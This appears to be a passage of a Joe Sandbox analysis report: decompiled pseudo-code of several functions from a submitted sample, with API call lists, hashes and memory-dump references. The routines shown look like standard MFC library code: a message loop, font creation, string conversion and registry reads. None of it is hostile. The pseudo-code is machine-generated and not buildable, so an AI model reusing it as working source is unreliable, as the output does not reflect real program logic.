                                                                              0x0041a42b
                                                                              0x0041a42c
                                                                              0x0041a431
                                                                              0x0041a440
                                                                              0x0041a448
                                                                              0x0041a44e
                                                                              0x0041a452
                                                                              0x0041a491
                                                                              0x0041a49a
                                                                              0x0041a4a5
                                                                              0x0041a4a8
                                                                              0x0041a4b5
                                                                              0x0041a4b7
                                                                              0x0041a4be
                                                                              0x0041a4c3
                                                                              0x0041a4c5
                                                                              0x0041a4c5
                                                                              0x0041a4ca
                                                                              0x0041a4cf
                                                                              0x0041a4d3
                                                                              0x0041a4e2
                                                                              0x0041a4e2
                                                                              0x0041a4e3
                                                                              0x0041a4eb
                                                                              0x0041a4f7
                                                                              0x0041a501
                                                                              0x0041a502
                                                                              0x0041a511
                                                                              0x0041a51b
                                                                              0x0041a51e
                                                                              0x0041a52c
                                                                              0x0041a52e
                                                                              0x0041a537
                                                                              0x0041a53c
                                                                              0x0041a544
                                                                              0x0041a546
                                                                              0x00000000
                                                                              0x0041a4d5
                                                                              0x0041a4d5
                                                                              0x0041a4d7
                                                                              0x0041a4d7
                                                                              0x0041a4d8
                                                                              0x0041a4dd
                                                                              0x00000000
                                                                              0x0041a4dd
                                                                              0x0041a4d3
                                                                              0x0041a454
                                                                              0x0041a454
                                                                              0x0041a456
                                                                              0x0041a48a
                                                                              0x0041a48a
                                                                              0x00000000
                                                                              0x0041a48a
                                                                              0x0041a438
                                                                              0x0041a439
                                                                              0x0041a43a
                                                                              0x0041a43e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041a43e
                                                                              0x0041a411
                                                                              0x0041a381
                                                                              0x0041a389
                                                                              0x0041a38c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041a38e
                                                                              0x00000000
                                                                              0x0041a38e
                                                                              0x0041a369

                                                                              APIs
                                                                                • Part of subcall function 00416254: GetLastError.KERNEL32(?,00000000,004141FF,004148BA,00000000,0044BD10,00000008,00414911,?,?,?,00414733,00000004,0044BD00,00000010,004164BE), ref: 00416256
                                                                                • Part of subcall function 00416254: FlsGetValue.KERNEL32(?,00414733,00000004,0044BD00,00000010,004164BE,00000001,0000008C,?,0044BC68,00000060), ref: 00416264
                                                                                • Part of subcall function 00416254: FlsSetValue.KERNEL32(00000000,?,00414733,00000004,0044BD00,00000010,004164BE,00000001,0000008C,?,0044BC68,00000060), ref: 0041628B
                                                                                • Part of subcall function 00416254: GetCurrentThreadId.KERNEL32 ref: 004162A3
                                                                                • Part of subcall function 00416254: SetLastError.KERNEL32(00000000,?,00414733,00000004,0044BD00,00000010,004164BE,00000001,0000008C,?,0044BC68,00000060), ref: 004162BA
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041A3A1
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041A49E
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041A4F7
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041A514
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041A537
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$ErrorLastValue$CurrentThread
                                                                              • String ID: XyE
                                                                              • API String ID: 223281555-1705365946
                                                                              • Opcode ID: 9b866a42f09a7327600a0d54408eed70851fcbfd2860b31ced82f13353b9270e
                                                                              • Instruction ID: 27c438e82812b57df1231637a248915d31752a43d1760983d55ffa738ffd830e
                                                                              • Opcode Fuzzy Hash: 9b866a42f09a7327600a0d54408eed70851fcbfd2860b31ced82f13353b9270e
                                                                              • Instruction Fuzzy Hash: 22613AB2A01315AFDB10DF99CC45BEEB7F6EB84314F20452FF5109B282D7B899908B19
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00425EAA, Relevance: 10.6, APIs: 7, Instructions: 115windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 97%
                                                                              			E00425EAA(intOrPtr* __ecx, signed int _a4) {
				struct HWND__* _v4;
				struct tagMSG* _v8;
				int _v12;
				int _v16;
				struct HWND__* _t42;
				signed int _t45;
				int _t53;
				long _t56;
				int _t62;
				intOrPtr* _t69;

				_t62 = 1;
				_t69 = __ecx;
				_v12 = 1;
				_v16 = 0;
				if((_a4 & 0x00000004) == 0 || (E00428375(__ecx) & 0x10000000) != 0) {
					_t62 = 0;
				}
				_t42 = GetParent( *(_t69 + 0x1c));
				 *(_t69 + 0x38) =  *(_t69 + 0x38) | 0x00000018;
				_v4 = _t42;
				_v8 = E004239CE();
				L14:
				while(1) {
					L14:
					while(_v12 != 0) {
						if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
							while(1) {
								L15:
								_t45 = E00423CD2();
								if(_t45 == 0) {
									break;
								}
								if(_t62 != 0) {
									_t53 = _v8->message;
									if(_t53 == 0x118 || _t53 == 0x104) {
										E00428423(_t69, 1);
										UpdateWindow( *(_t69 + 0x1c));
										_t62 = 0;
									}
								}
								if( *((intOrPtr*)( *_t69 + 0x80))() == 0) {
									 *(_t69 + 0x38) =  *(_t69 + 0x38) & 0xffffffe7;
									return  *((intOrPtr*)(_t69 + 0x40));
								} else {
									if(E00423C3E(_v8) != 0) {
										_v12 = 1;
										_v16 = 0;
									}
									if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
										continue;
									} else {
										goto L14;
									}
								}
							}
							_push(0);
							E00430228();
							return _t45 | 0xffffffff;
						}
						if(_t62 != 0) {
							E00428423(_t69, 1);
							UpdateWindow( *(_t69 + 0x1c));
							_t62 = 0;
						}
						if((_a4 & 0x00000001) == 0 && _v4 != 0 && _v16 == 0) {
							SendMessageA(_v4, 0x121, 0,  *(_t69 + 0x1c));
						}
						if((_a4 & 0x00000002) != 0) {
							L13:
							_v12 = 0;
							continue;
						} else {
							_t56 = SendMessageA( *(_t69 + 0x1c), 0x36a, 0, _v16);
							_v16 = _v16 + 1;
							if(_t56 != 0) {
								continue;
							}
							goto L13;
						}
					}
					goto L15;
				}
			}













                                                                              0x00425eb3
                                                                              0x00425ebb
                                                                              0x00425ebd
                                                                              0x00425ec1
                                                                              0x00425ec5
                                                                              0x00425ed3
                                                                              0x00425ed3
                                                                              0x00425ed8
                                                                              0x00425ede
                                                                              0x00425ee2
                                                                              0x00425ef1
                                                                              0x00000000
                                                                              0x00425f69
                                                                              0x00000000
                                                                              0x00425f69
                                                                              0x00425f07
                                                                              0x00425f6f
                                                                              0x00425f6f
                                                                              0x00425f6f
                                                                              0x00425f76
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00425f7a
                                                                              0x00425f80
                                                                              0x00425f88
                                                                              0x00425f95
                                                                              0x00425f9d
                                                                              0x00425f9f
                                                                              0x00425f9f
                                                                              0x00425f88
                                                                              0x00425fad
                                                                              0x00425fe8
                                                                              0x00000000
                                                                              0x00425faf
                                                                              0x00425fbb
                                                                              0x00425fbd
                                                                              0x00425fc5
                                                                              0x00425fc5
                                                                              0x00425fd9
                                                                              0x00000000
                                                                              0x00425fdb
                                                                              0x00000000
                                                                              0x00425fdb
                                                                              0x00425fd9
                                                                              0x00425fad
                                                                              0x00425fdd
                                                                              0x00425fde
                                                                              0x00000000
                                                                              0x00425fe3
                                                                              0x00425f0b
                                                                              0x00425f11
                                                                              0x00425f19
                                                                              0x00425f1b
                                                                              0x00425f1b
                                                                              0x00425f22
                                                                              0x00425f3d
                                                                              0x00425f3d
                                                                              0x00425f48
                                                                              0x00425f65
                                                                              0x00425f65
                                                                              0x00000000
                                                                              0x00425f4a
                                                                              0x00425f57
                                                                              0x00425f5d
                                                                              0x00425f63
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00425f63
                                                                              0x00425f48
                                                                              0x00000000
                                                                              0x00425f69

                                                                              APIs
                                                                              • GetParent.USER32(?), ref: 00425ED8
                                                                              • PeekMessageA.USER32 ref: 00425EFF
                                                                              • UpdateWindow.USER32(?), ref: 00425F19
                                                                              • SendMessageA.USER32(?,00000121,00000000,?), ref: 00425F3D
                                                                              • SendMessageA.USER32(?,0000036A,00000000,00000004), ref: 00425F57
                                                                              • UpdateWindow.USER32(?), ref: 00425F9D
                                                                              • PeekMessageA.USER32 ref: 00425FD1
                                                                                • Part of subcall function 00428375: GetWindowLongA.USER32 ref: 00428380
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                              • String ID:
                                                                              • API String ID: 2853195852-0
                                                                              • Opcode ID: 248d8cbeb3e497a3571f826ab21379d0acc7778130612cdd31a67b0a7a11fd55
                                                                              • Instruction ID: 62f58de11374fd1399b8c231da8365a07df3de89b82652908c1bdddcf5ef21d3
                                                                              • Opcode Fuzzy Hash: 248d8cbeb3e497a3571f826ab21379d0acc7778130612cdd31a67b0a7a11fd55
                                                                              • Instruction Fuzzy Hash: 7041E130308B519BD721DF22EE44A2BBAF4EFC4B15F95092EF481921A0DB79C945CB1A
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0040A7D8, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114comstringCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 78%
                                                                              			E0040A7D8(void* __ecx) {
				intOrPtr _t54;
				intOrPtr _t56;
				signed int _t72;
				signed int _t74;
				void* _t79;
				void* _t81;
				void* _t85;
				void* _t100;
				void* _t101;
				void* _t103;
				signed int _t106;
				intOrPtr* _t107;
				void* _t109;
				void* _t111;
				void* _t112;

				E004128A0(E00431063, _t109);
				_t112 = _t111 - 0x80;
				_t54 =  *0x457184; // 0xc72e1596
				 *((intOrPtr*)(_t109 - 0x10)) = _t54;
				_t101 = __ecx;
				 *((intOrPtr*)(_t109 - 0x58)) =  *0x4560dc(_t100, _t103, _t85);
				 *((intOrPtr*)(_t109 - 0x50)) = 0;
				 *((intOrPtr*)(_t109 - 0x54)) = 0x44ab68;
				_t56 =  *((intOrPtr*)(_t109 + 8));
				 *(_t109 - 4) = 0;
				if(_t56 == 0 ||  *(_t56 + 4) == 0) {
					if(E0040A443(_t109 - 0x54, 0x11) != 0 || E0040A443(_t109 - 0x54, 0xd) != 0) {
						_t56 = _t109 - 0x54;
						goto L6;
					} else {
						 *((intOrPtr*)(_t101 + 0x60)) = 0;
					}
				} else {
					L6:
					_t13 = _t56 + 4; // 0x40ade8
					GetObjectA( *_t13, 0x3c, _t109 - 0x4c);
					 *((intOrPtr*)(_t109 - 0x78)) = 0x20;
					_t105 = lstrlenA(_t109 - 0x30) + 1;
					E00412260(lstrlenA(_t109 - 0x30) + 0x00000001 + lstrlenA(_t109 - 0x30) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109 - 0x4c);
					 *((intOrPtr*)(_t109 - 0x74)) = E00408F24(_t112, _t109 - 0x30, _t105,  *((intOrPtr*)(_t109 - 0x58)));
					 *((short*)(_t109 - 0x68)) =  *((intOrPtr*)(_t109 - 0x3c));
					 *(_t109 - 0x66) =  *(_t109 - 0x35) & 0x000000ff;
					 *(_t109 - 0x64) =  *(_t109 - 0x38) & 0x000000ff;
					 *(_t109 - 0x60) =  *(_t109 - 0x37) & 0x000000ff;
					 *(_t109 - 0x5c) =  *(_t109 - 0x36) & 0x000000ff;
					_t72 =  *(_t109 - 0x4c);
					_t106 = _t72;
					if(_t72 < 0) {
						_t106 =  ~_t72;
					}
					E0042A852(_t109 - 0x8c);
					 *(_t109 - 4) = 1;
					_t74 = GetDeviceCaps( *(_t109 - 0x84), 0x5a);
					asm("cdq");
					_t107 = _t101 + 0x60;
					 *((intOrPtr*)(_t109 - 0x6c)) = 0;
					 *(_t109 - 0x70) = _t106 * 0xafc80 / _t74;
					E0042E9AB(_t107);
					_t79 = _t109 - 0x78;
					__imp__#420(_t79, 0x44defc, _t107,  *((intOrPtr*)(_t101 + 0x1c)));
					if(_t79 < 0) {
						 *_t107 = 0;
					}
					 *(_t109 - 4) = 0;
					E0042A8AD(_t109 - 0x8c);
				}
				 *(_t109 - 4) =  *(_t109 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t109 - 0x54)) = 0x44a720;
				_t81 = E0042AA72(_t109 - 0x54);
				 *[fs:0x0] =  *((intOrPtr*)(_t109 - 0xc));
				return E00412FBB(_t81,  *((intOrPtr*)(_t109 - 0x10)));
			}


















                                                                              0x0040a7dd
                                                                              0x0040a7e2
                                                                              0x0040a7e8
                                                                              0x0040a7f0
                                                                              0x0040a7f3
                                                                              0x0040a7fd
                                                                              0x0040a800
                                                                              0x0040a803
                                                                              0x0040a80a
                                                                              0x0040a80f
                                                                              0x0040a812
                                                                              0x0040a825
                                                                              0x0040a83d
                                                                              0x00000000
                                                                              0x0040a835
                                                                              0x0040a835
                                                                              0x0040a835
                                                                              0x0040a840
                                                                              0x0040a840
                                                                              0x0040a846
                                                                              0x0040a849
                                                                              0x0040a853
                                                                              0x0040a862
                                                                              0x0040a86c
                                                                              0x0040a881
                                                                              0x0040a888
                                                                              0x0040a891
                                                                              0x0040a899
                                                                              0x0040a8a0
                                                                              0x0040a8a7
                                                                              0x0040a8aa
                                                                              0x0040a8af
                                                                              0x0040a8b1
                                                                              0x0040a8b5
                                                                              0x0040a8b5
                                                                              0x0040a8c0
                                                                              0x0040a8cd
                                                                              0x0040a8d1
                                                                              0x0040a8e1
                                                                              0x0040a8e4
                                                                              0x0040a8e8
                                                                              0x0040a8eb
                                                                              0x0040a8ee
                                                                              0x0040a8f9
                                                                              0x0040a8fd
                                                                              0x0040a905
                                                                              0x0040a907
                                                                              0x0040a907
                                                                              0x0040a90f
                                                                              0x0040a912
                                                                              0x0040a912
                                                                              0x0040a917
                                                                              0x0040a91e
                                                                              0x0040a925
                                                                              0x0040a933
                                                                              0x0040a946

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 0040A7DD
                                                                              • GetObjectA.GDI32(0040ADE8,0000003C,?), ref: 0040A849
                                                                              • lstrlenA.KERNEL32(?), ref: 0040A85A
                                                                              • GetDeviceCaps.GDI32(?,0000005A), ref: 0040A8D1
                                                                              • OleCreateFontIndirect.OLEAUT32(00000020,0044DEFC,?), ref: 0040A8FD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: CapsCreateDeviceFontH_prologIndirectObjectlstrlen
                                                                              • String ID:
                                                                              • API String ID: 4082312370-3916222277
                                                                              • Opcode ID: e837e6e32dedd2ae5b39fabd8b2637de7c3d9a6e084b0529e315272666ecf5a3
                                                                              • Instruction ID: 5972f824610752a30fb003f3ef6cffcbbdeb07862816cf9b4ba45c9e708fb7dd
                                                                              • Opcode Fuzzy Hash: e837e6e32dedd2ae5b39fabd8b2637de7c3d9a6e084b0529e315272666ecf5a3
                                                                              • Instruction Fuzzy Hash: D4419971E01259AFCB10EFE5D945ADDBBB4BF18304F10807EE815E7291E7788A19CB15
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041FCB0, Relevance: 10.6, APIs: 7, Instructions: 111memorystringCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 73%
                                                                              			E0041FCB0(void* __ecx, char* _a4) {
				int _v8;
				intOrPtr _v20;
				short* _v28;
				int _v32;
				int _v36;
				short* _v40;
				void* _v52;
				void* __ebp;
				int _t16;
				void* _t26;
				short* _t27;
				int _t28;
				int _t40;
				int _t41;
				void* _t42;
				short* _t47;
				char* _t49;
				int _t51;
				intOrPtr _t53;
				short* _t54;

				_t42 = __ecx;
				_push(0xffffffff);
				_push(0x44e5a0);
				_push(E00412BF8);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t53;
				_t54 = _t53 - 0x14;
				_v28 = _t54;
				_t49 = _a4;
				if(_t49 == 0) {
					L13:
					_t16 = 0;
					L19:
					 *[fs:0x0] = _v20;
					return _t16;
				}
				_t40 = lstrlenA(_t49) + 1;
				_v32 = _t40;
				_t51 = MultiByteToWideChar(0, 0, _t49, _t40, 0, 0);
				_v36 = _t51;
				if(_t51 == 0) {
					L10:
					if(GetLastError() > 0) {
						E0041FC30(GetLastError() & 0x0000ffff | 0x80070000);
						goto L13;
					}
					E0041FC30(GetLastError());
					_t16 = 0;
					goto L19;
				}
				_v8 = 0;
				_t26 = _t51 + _t51;
				if(_t51 >= 0x1000) {
					_t27 = E00412247(_t26);
					_t54 =  &(_t54[2]);
					_t47 = _t27;
					_v40 = _t47;
					_v8 = 0xffffffff;
				} else {
					E00412260(_t26 + 0x00000003 & 0xfffffffc, _t42);
					_v28 = _t54;
					_t47 = _t54;
					_v40 = _t47;
					_v8 = 0xffffffff;
				}
				if(_t47 != 0) {
					_t28 = MultiByteToWideChar(0, 0, _a4, _t40, _t47, _t51);
					if(_t28 != 0) {
						__imp__#2(_t47);
						_t41 = _t28;
						if(_t51 >= 0x1000) {
							_push(_t47);
							E00412A4D();
						}
						if(_t41 == 0) {
							E0041FC30(0x8007000e);
						}
						_t16 = _t41;
						goto L19;
					}
					if(_t51 >= 0x1000) {
						_push(_t47);
						E00412A4D();
					}
					goto L10;
				} else {
					E0041FC30(0x8007000e);
					_t16 = 0;
					goto L19;
				}
			}























                                                                              0x0041fcb0
                                                                              0x0041fcb3
                                                                              0x0041fcb5
                                                                              0x0041fcba
                                                                              0x0041fcc5
                                                                              0x0041fcc6
                                                                              0x0041fccd
                                                                              0x0041fcd3
                                                                              0x0041fcd6
                                                                              0x0041fcdb
                                                                              0x0041fdcc
                                                                              0x0041fdcc
                                                                              0x0041fdfa
                                                                              0x0041fe00
                                                                              0x0041fe0d
                                                                              0x0041fe0d
                                                                              0x0041fcea
                                                                              0x0041fceb
                                                                              0x0041fcfe
                                                                              0x0041fd00
                                                                              0x0041fd05
                                                                              0x0041fda2
                                                                              0x0041fdac
                                                                              0x0041fdc7
                                                                              0x00000000
                                                                              0x0041fdc7
                                                                              0x0041fdb1
                                                                              0x0041fdb6
                                                                              0x00000000
                                                                              0x0041fdb6
                                                                              0x0041fd0b
                                                                              0x0041fd12
                                                                              0x0041fd1b
                                                                              0x0041fd3c
                                                                              0x0041fd41
                                                                              0x0041fd44
                                                                              0x0041fd46
                                                                              0x0041fd49
                                                                              0x0041fd1d
                                                                              0x0041fd23
                                                                              0x0041fd28
                                                                              0x0041fd2d
                                                                              0x0041fd2f
                                                                              0x0041fd32
                                                                              0x0041fd32
                                                                              0x0041fd6c
                                                                              0x0041fd87
                                                                              0x0041fd8f
                                                                              0x0041fdd1
                                                                              0x0041fdd7
                                                                              0x0041fddf
                                                                              0x0041fde1
                                                                              0x0041fde2
                                                                              0x0041fde7
                                                                              0x0041fdec
                                                                              0x0041fdf3
                                                                              0x0041fdf3
                                                                              0x0041fdf8
                                                                              0x00000000
                                                                              0x0041fdf8
                                                                              0x0041fd97
                                                                              0x0041fd99
                                                                              0x0041fd9a
                                                                              0x0041fd9f
                                                                              0x00000000
                                                                              0x0041fd6e
                                                                              0x0041fd73
                                                                              0x0041fd78
                                                                              0x00000000
                                                                              0x0041fd78

                                                                              APIs
                                                                              • lstrlenA.KERNEL32(?), ref: 0041FCE2
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 0041FCF8
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 0041FD87
                                                                              • GetLastError.KERNEL32 ref: 0041FDA8
                                                                              • GetLastError.KERNEL32 ref: 0041FDAE
                                                                              • GetLastError.KERNEL32 ref: 0041FDBA
                                                                                • Part of subcall function 00412A4D: __lock.LIBCMT ref: 00412A6B
                                                                                • Part of subcall function 00412A4D: RtlFreeHeap.NTDLL(00000000,?,0044BC58,0000000C,004148DC,00000000,0044BD10,00000008,00414911,?,?,?,00414733,00000004,0044BD00,00000010), ref: 00412AB2
                                                                              • SysAllocString.OLEAUT32(00000000), ref: 0041FDD1
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$ByteCharMultiWide$AllocFreeHeapString__locklstrlen
                                                                              • String ID:
                                                                              • API String ID: 2239859820-0
                                                                              • Opcode ID: 0d858a5a2278e1ec2dc8d46b732713cb78756dbb49cc2d56b9541277e8871e7b
                                                                              • Instruction ID: 5814fb192f880a29087053bfc4bd0927105c7e6f03bec0e2e998cf170e3ae287
                                                                              • Opcode Fuzzy Hash: 0d858a5a2278e1ec2dc8d46b732713cb78756dbb49cc2d56b9541277e8871e7b
                                                                              • Instruction Fuzzy Hash: BD31FD72D00615ABD7209B65DD46BFF7AA8FF04754F10013BF816E3280E67C998686EA
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042CADD, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 105registryCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 70%
                                                                              			E0042CADD(void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t46;
				intOrPtr* _t65;
				void* _t85;
				void* _t88;

				_t79 = __edx;
				E004128A0(E00430D5A, _t88);
				_t37 =  *0x457184; // 0xc72e1596
				 *((intOrPtr*)(_t88 - 0x10)) = _t37;
				_t85 = __ecx;
				 *(_t88 - 0x120) = 0;
				_t38 = E0042B726(__ecx, __edx);
				 *((intOrPtr*)(_t88 - 0x128)) = _t38;
				if(_t38 != 0) {
					do {
						_t79 = _t88 - 0x128;
						_t65 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 + 0x54)))) + 0x14))(_t88 - 0x128);
						if(_t65 != 0) {
							_t79 =  *_t65;
							 *((intOrPtr*)( *_t65 + 0xc))(0, 0xfffffffc, 0, 0);
						}
					} while ( *((intOrPtr*)(_t88 - 0x128)) != 0);
				}
				_t98 =  *((intOrPtr*)(_t85 + 0x50));
				if( *((intOrPtr*)(_t85 + 0x50)) != 0) {
					_push("Software\\");
					E0040830B(_t88 - 0x11c, _t98);
					 *((intOrPtr*)(_t88 - 4)) = 0;
					E0042B737(_t88 - 0x11c,  *((intOrPtr*)(_t85 + 0x50)));
					_push(0x449394);
					_push(_t88 - 0x11c);
					_push(_t88 - 0x12c);
					_t46 = E00407A53(_t88 - 0x11c);
					_push( *((intOrPtr*)(_t85 + 0x64)));
					 *((char*)(_t88 - 4)) = 1;
					_push(_t46);
					_push(_t88 - 0x124);
					E00407A53(_t88 - 0x11c);
					 *((char*)(_t88 - 4)) = 3;
					E00401000( *((intOrPtr*)(_t88 - 0x12c)) + 0xfffffff0, _t79);
					_push(_t88 - 0x124);
					_push(0x80000001);
					E0042C9C9(_t79);
					if(RegOpenKeyA(0x80000001,  *(_t88 - 0x11c), _t88 - 0x120) == 0) {
						if(RegEnumKeyA( *(_t88 - 0x120), 0, _t88 - 0x118, 0x104) == 0x103) {
							_push(_t88 - 0x11c);
							_push(0x80000001);
							E0042C9C9(_t79);
						}
						RegCloseKey( *(_t88 - 0x120));
					}
					RegQueryValueA(0x80000001,  *(_t88 - 0x124), _t88 - 0x118, _t88 - 0x130);
					E00401000( *(_t88 - 0x124) - 0x10, _t79);
					E00401000( &(( *(_t88 - 0x11c))[0xfffffffffffffff0]), _t79);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t88 - 0xc));
				return E00412FBB(1,  *((intOrPtr*)(_t88 - 0x10)));
			}









                                                                              0x0042cadd
                                                                              0x0042cae2
                                                                              0x0042caed
                                                                              0x0042caf6
                                                                              0x0042caf9
                                                                              0x0042cafb
                                                                              0x0042cb01
                                                                              0x0042cb08
                                                                              0x0042cb0e
                                                                              0x0042cb10
                                                                              0x0042cb15
                                                                              0x0042cb1c
                                                                              0x0042cb21
                                                                              0x0042cb23
                                                                              0x0042cb2c
                                                                              0x0042cb2c
                                                                              0x0042cb2f
                                                                              0x0042cb10
                                                                              0x0042cb37
                                                                              0x0042cb3a
                                                                              0x0042cb40
                                                                              0x0042cb4b
                                                                              0x0042cb59
                                                                              0x0042cb5c
                                                                              0x0042cb61
                                                                              0x0042cb6c
                                                                              0x0042cb73
                                                                              0x0042cb74
                                                                              0x0042cb79
                                                                              0x0042cb7c
                                                                              0x0042cb80
                                                                              0x0042cb87
                                                                              0x0042cb88
                                                                              0x0042cb99
                                                                              0x0042cb9d
                                                                              0x0042cba8
                                                                              0x0042cbae
                                                                              0x0042cbaf
                                                                              0x0042cbca
                                                                              0x0042cbea
                                                                              0x0042cbf2
                                                                              0x0042cbf3
                                                                              0x0042cbf4
                                                                              0x0042cbf4
                                                                              0x0042cbff
                                                                              0x0042cbff
                                                                              0x0042cc1b
                                                                              0x0042cc24
                                                                              0x0042cc32
                                                                              0x0042cc32
                                                                              0x0042cc3d
                                                                              0x0042cc4f

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 0042CAE2
                                                                              • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0042CBC2
                                                                              • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 0042CBDF
                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,Software\), ref: 0042CBFF
                                                                              • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 0042CC1B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: CloseEnumH_prologOpenQueryValue
                                                                              • String ID: Software\
                                                                              • API String ID: 2161548231-964853688
                                                                              • Opcode ID: 82e553787280bd53ca098809db884a7fb69526bb0bb7422cdc428558258d0341
                                                                              • Instruction ID: df4a8358d44512eab2e3aab5947f5eb7ce26cd725ee5649e29835c3142a63b74
                                                                              • Opcode Fuzzy Hash: 82e553787280bd53ca098809db884a7fb69526bb0bb7422cdc428558258d0341
                                                                              • Instruction Fuzzy Hash: 9441A2319001289BCB25EB65DD85EEEB7B9EF49304F0001AAF145E2291DB789A95CF98
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042DE78, Relevance: 10.6, APIs: 7, Instructions: 96memoryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 85%
